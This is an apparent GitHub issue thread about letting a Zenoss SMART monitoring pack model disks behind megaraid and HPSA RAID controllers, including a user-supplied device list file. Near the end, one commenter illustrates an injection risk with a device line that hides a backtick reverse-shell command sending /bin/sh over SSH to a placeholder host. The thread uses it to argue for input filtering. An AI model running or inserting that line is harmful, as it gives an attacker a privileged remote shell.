Support indexed devices behind RAID controller
Closed this issue · 25 comments
Need to model driver & index from smartctl --scan
so that the --device
parameter can be passed during performance stat collection.
/dev/bus/0 -d megaraid,8
for example
May need new system for component ID, and don't really want to use serial number.
I've seen HPSA's requiring weirdness like smartctl -d /dev/sda -d cciss,1
to query sda
but then querying sdb
can still work by accessing sda
using smartctl -d /dev/sda -d cciss,1
or the like.
This would be a grand feature for the pack as those things, their Dell counterparts, and other rebranded LSI & friends' kit using silly distributor firmware are all too common.
Were they showing up before?
Can you post the smartctl --scan
output from that host?
This is now working, at least for megaraid. Checking HPSAs shortly (all of the ones i have right now are in HBA mode instead of LUN-per-disk like the older stuff).
HPSA isnt so great. You can get to it via:
smartctl -iAH /dev/sda -d cciss,1
smartctl 7.2 2020-12-30 r5155 [x86_64-linux-5.10.75] (local build)
Copyright (C) 2002-20, Bruce Allen, Christian Franke, www.smartmontools.org
=== START OF INFORMATION SECTION ===
Model Family: Western Digital Red
Device Model: WDC WD30EFRX-68EUZN0
Serial Number: WD-WCC4NXXXXXXX
LU WWN Device Id: 5 0014ee 20d1a13eb
Firmware Version: 82.00A82
User Capacity: 3,000,592,982,016 bytes [3.00 TB]
Sector Sizes: 512 bytes logical, 4096 bytes physical
Rotation Rate: 5400 rpm
Device is: In smartctl database [for details use: -P show]
ATA Version is: ACS-2 (minor revision not indicated)
SATA Version is: SATA 3.0, 6.0 Gb/s (current: 6.0 Gb/s)
Local Time is: Mon Nov 15 00:44:53 2021 UTC
SMART support is: Available - device has SMART capability.
SMART support is: Enabled
=== START OF READ SMART DATA SECTION ===
SMART Status not supported: Incomplete response, ATA output registers missing
SMART overall-health self-assessment test result: PASSED
Warning: This result is based on an Attribute check.
SMART Attributes Data Structure revision number: 16
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME FLAG VALUE WORST THRESH TYPE UPDATED WHEN_FAILED RAW_VALUE
1 Raw_Read_Error_Rate 0x002f 200 200 051 Pre-fail Always - 0
3 Spin_Up_Time 0x0027 182 182 021 Pre-fail Always - 5883
4 Start_Stop_Count 0x0032 100 100 000 Old_age Always - 52
5 Reallocated_Sector_Ct 0x0033 200 200 140 Pre-fail Always - 0
7 Seek_Error_Rate 0x002e 200 200 000 Old_age Always - 0
9 Power_On_Hours 0x0032 068 068 000 Old_age Always - 23724
10 Spin_Retry_Count 0x0032 100 253 000 Old_age Always - 0
11 Calibration_Retry_Count 0x0032 100 253 000 Old_age Always - 0
12 Power_Cycle_Count 0x0032 100 100 000 Old_age Always - 52
192 Power-Off_Retract_Count 0x0032 200 200 000 Old_age Always - 46
193 Load_Cycle_Count 0x0032 191 191 000 Old_age Always - 29382
194 Temperature_Celsius 0x0022 113 102 000 Old_age Always - 37
196 Reallocated_Event_Count 0x0032 200 200 000 Old_age Always - 0
197 Current_Pending_Sector 0x0032 200 200 000 Old_age Always - 0
198 Offline_Uncorrectable 0x0030 100 253 000 Old_age Offline - 0
199 UDMA_CRC_Error_Count 0x0032 200 200 000 Old_age Always - 0
200 Multi_Zone_Error_Rate 0x0008 100 253 000 Old_age Offline - 0
there's no /dev/bus/0
and --scan
only shows sdg
which is SATA-conncted :(. Fun story with these is that /dev/sda -d cciss,1
and 2
and 3
and so on give you different disks so the interface is /dev/sda
but the number at the end is the drive being interrogated.
Dell uses megaraid i guess, so that works (older r410s tested)
If --scan
doesn't show them, I'm a little unsure how to discover them. What would you think of a text file in the home dir of the Zenoss utility account on the target host with things like "/dev/sda -d cciss,1" for manual entries to model?
The text file idea is neat, but you might run into nonsense with how the new dockerized zenoss handles state. It also decapsulates the intrinsic data storage paradigm of the stack as IIRC only the Zenoss application uses local files (configs) whereas the application logic itself uses the DB.
Need to ponder on this one, kind of a pickle - lots of HPSAs out there.
I meant a file on the remote host, to be read after the smartctl scan. Not suggesting we start modify the Zenoss collection container images :)
382fa8d will look for a zenoss_smart.txt
file in the home directory of whatever account Zenoss is using to SSH on the target machine.
For example:
/dev/sda -d cciss,1
/dev/sda -d cciss,2
/dev/sda -d cciss,3
and the modeler should pick it up
Thank you sir - using i=0; for e in a b c d e f; do echo "sd$e -d cciss,$i"; i=$((i+1)); done > ~/zenoss_smart.txt
on the target host to test.
So @ 5b14dfc, with that file created, i am unfortunately not seeing drives appear in the SMART component after a full Zenoss restart post-update. It does still pick up the one device that is SATA-connected and not on the HPSA (nor in the ~/zenoss_smart.txt
file) in case that matters.
Ah! i see what i did wrong there - needed to be i=0; for e in a b c d e f; do echo "/dev/sd$e -d cciss,$i"; i=$((i+1)); done > zenoss_smart.txt
... it can't presume /dev/
as the path so needs a full path from root mount.
Works as described - thank you.
Excellent. I'll update the Readme shortly.
As for the columns, could you make a table showing what you have in mind? I want to make sure I'm following you correctly.
For consistency's sake, how are thinking these cases should look?
- /dev/sda -d cciss,X
- /dev/bus/0 -d megaraid,X (with matching /dev/sdX)
- /dev/bus/0 -d megaraid,X (without matching sdX)
- /dev/sdg -d auto
Thanks!
Sorry, didn't mean to confuse the issue: the screenshot above includes a SATA disk at the bottom and CCISS disks at the top. The suggestion was to have the top disks look like the bottom one in the generic view, at least such that the device
column is .split('/')[-1]
Just a heads up - Zenoss 6 doesn't seem to need this, but v4 does apparently require we remove and replace the zenpack at this point. It might be the older construction kit though:
[zenoss@zen01 ZenPacks.daviswr.SMART]$ fil /var/spool/mail/zenoss
-bash: fil: command not found
[zenoss@zen01 ZenPacks.daviswr.SMART]$ file /var/spool/mail/zenoss
/var/spool/mail/zenoss: ASCII mail text, with very long lines
[zenoss@zen01 ZenPacks.daviswr.SMART]$ tail /var/spool/mail/zenoss
File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
from Products.ZenModel.migrate.Migrate import Version
File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
__import__(module[:-3], locals(), globals())
File "/opt/zenoss/Products/ZenModel/migrate/fixEmailNotificationClearSubjectFormat.py", line 18, in <module>
from Products.ZenModel.migrate import Migrate
ImportError: cannot import name Migrate
...
This might be a bit more messy than expected. Looks like on zenoss4 there's some constructionkit issue:
ERROR:zen.ZenossStartup:Error encountered while processing ZenPacks.community.ConstructionKit
Traceback (most recent call last):
File "/opt/zenoss/Products/ZenossStartup/__init__.py", line 27, in <module>
pkg_path = zpkg.load().__path__[0]
File "/opt/zenoss/lib/python/pkg_resources.py", line 1954, in load
entry = __import__(self.module_name, globals(),globals(), ['__name__'])
File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/__init__.py", line 3, in <module>
from ZenPacks.community.ConstructionKit.Construct import *
File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/Construct.py", line 7, in <module>
from ZenPacks.community.ConstructionKit.BasicDefinition import *
File "/opt/zenoss/packs/ZenPacks.community.ConstructionKit/ZenPacks/community/ConstructionKit/BasicDefinition.py", line 1, in <module>
from Products.ZenModel.migrate.Migrate import Version
File "/opt/zenoss/Products/ZenModel/migrate/__init__.py", line 28, in <module>
__import__(module[:-3], locals(), globals())
File "/opt/zenoss/Products/ZenModel/migrate/standalone_datapoint_rename.py", line 19, in <module>
os.rename(fullpath, os.path.join(d, '%s_%s.rrd' % (base, base)))
OSError: [Errno 2] No such file or directory
... and that's just the --remove
call. Might be in for some pain here.
None of my packs use ConstructionKit, they're all built on ZenPackLib.
Ha, well, this instance is ~5yo and has ~100 packs in it. Its all on ZFS anyway and i take zenbatchdumps so i can restore snaps or the whole thing. Its slated for replacement in Q1 anyway with a v6 somewhere up in Bezos' stack. Unwinding zope-isms is bad enough, not sure how far down this specific rabbit hole i want to fall in terms of RCA if i can recover state (though the quality of said state is definitely in question now).
Just in case it's causing a problem, though, add this back to the yaml after classes->SmartStorage->properties->SmartSupport
# smartctl --get=all
AamFeature:
label: Automatic Acoustic Management
short_label: AAM
default: Unavailable
details_display: false
order: 29
ApmFeature:
label: Advanced Power Management
short_label: AAM
default: Unavailable
details_display: false
order: 30
RdLookAhead:
label: Read Look-Ahead
default: Unavailable
details_display: false
order: 31
WriteCache:
label: Write Cache
default: Unavailable
details_display: false
order: 32
AtaSecurity:
label: ATA Security
short_label: Security
default: Unavailable
details_display: false
order: 33
Though I've never had a problem removing a pack when the yaml lacked attributes it was installed with, aside from leaving shit on objects that doesn't need to be there. Renaming attributes, though, is a whole other can of worms.
Renaming has bitten me so many times that i'm pretty sure i produce anti-venom at this point - been using Zenoss for >10y. :) Its why we have SOP for cron jobs to do zen dumps - external state in a flat file is safer than the catacombs of Arkham asylum otherwise known as zodb/zope.
This seems to be working properly now - still seeing the -d cciss,X
suffix in the name
column, but functionally works just as advertised.
Would be remiss if i didn't ask - does the zenpack filter what's in these files in any way (drop |
, &&
, backticks, and so on)? I could see something like dirtycow happening years down the line permitting people to execute privileged commands by overwriting this file - its niche, but might hurt given the privs required to run smartctl
and how few people use granular sudo
configs (or straight-up root login for privileged functions).
EDIT - as an example, content such as this could create "a problem":
/dev/sda -d `mkfifo /tmp/kwpsul;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 255.255.255.255 0</tmp/kwpsul|/bin/sh >/tmp/kwpsul 2>&1;rm /tmp/kwpsul`
which has a lot of special characters and fun "filterables" but is just one of many publicly available similar payloads (well, in this case its a generator i wrote into MSF).
I can drop the -d param from the title if it also contains cciss
. Right now only "auto" is dropped and all indexed ones have the full name.
As for filtering file contents: right now, no, but I think a quick grep -v
with some common characters that likely won't ever be in a smartctl device name should provide some measure. I'll open an issue to track that.